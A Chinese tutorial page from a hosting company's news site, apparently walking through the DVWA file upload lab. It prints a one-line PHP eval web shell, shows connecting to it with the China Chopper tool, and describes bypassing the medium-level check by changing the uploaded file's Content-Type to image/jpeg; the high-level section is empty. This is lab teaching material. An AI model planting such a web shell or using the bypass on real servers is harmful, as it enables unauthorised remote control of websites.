溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
獲取短信驗證碼
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
登 錄 注冊有禮
云服務器 香港服務器 高防服務器
最新更新 網站標簽 地圖導航
產品

大數據中如何進行文件上傳漏洞的分析

發布時間:2021-12-09 19:27:22 來源:億速云 閱讀:207 作者:柒染 欄目:大數據

今天就跟大家聊聊有關大數據中如何進行文件上傳漏洞的分析,可能很多人都不太了解,為了讓大家更加了解,小編給大家總結了以下內容,希望大家根據這篇文章可以有所收獲。

一、環境:dvwa

二、選擇Upload,low級別

1、上傳1.php文件和1.jpg文件都沒問題

PHP文件內容為:

<?php @eval($_POST["abc"]);?>

大數據中如何進行文件上傳漏洞的分析

大數據中如何進行文件上傳漏洞的分析

2、訪問我們上傳的文件

http://192.168.152.188/dvwa/hackable/uploads/1.jpg

可以看到圖片

http://192.168.152.188/dvwa/hackable/uploads/1.php

什么都看不到

3、用菜刀鏈接1.php文件,點擊添加

大數據中如何進行文件上傳漏洞的分析

大數據中如何進行文件上傳漏洞的分析

4、雙擊鏈接進入

大數據中如何進行文件上傳漏洞的分析

三、選擇Upload,medium級別

1、上傳2.php文件和2.jpg文件,發現不能上傳2.php

2、點擊view source

大數據中如何進行文件上傳漏洞的分析

3、這里限制了上傳類型,抓包修改上傳類型

大數據中如何進行文件上傳漏洞的分析

4、我們將text/plain修改為image/jpeg,成功上傳

大數據中如何進行文件上傳漏洞的分析

5、用菜刀鏈接一下

大數據中如何進行文件上傳漏洞的分析

四、選擇Upload,high級別

看完上述內容,你們對大數據中如何進行文件上傳漏洞的分析有進一步的了解嗎?如果還想了解更多知識或者相關內容,請關注億速云行業資訊頻道,感謝大家的支持。

向AI問一下細節
推薦閱讀:
  1. 詳解文件上傳漏洞
  2. 怎么進行-2018-4990漏洞調試的分析

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

大數據

猜你喜歡

最新資訊
相關推薦

相關標簽

大數據時代 大數據就業 大數據測試分析 杭州大數據 大數據教程 大數據開發 大數據專業 大數據分析 大數據應用 大數據學習路線 大數據培訓 大數據處理 大數據量 大數據波分傳輸 大數據中心 大數據測試 大數據課程 大數據運營 大數據架構 大數據入門基礎
AI

產品服務
地區劃分
專題活動
幫助支持
關于我們
售后咨詢
7*24小時在線電話:400-100-2938
7*24小時在線 QQ:800811969
關注億速云

億速云公眾號

手機網站二維碼

Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有

廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號:B1-20181529

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女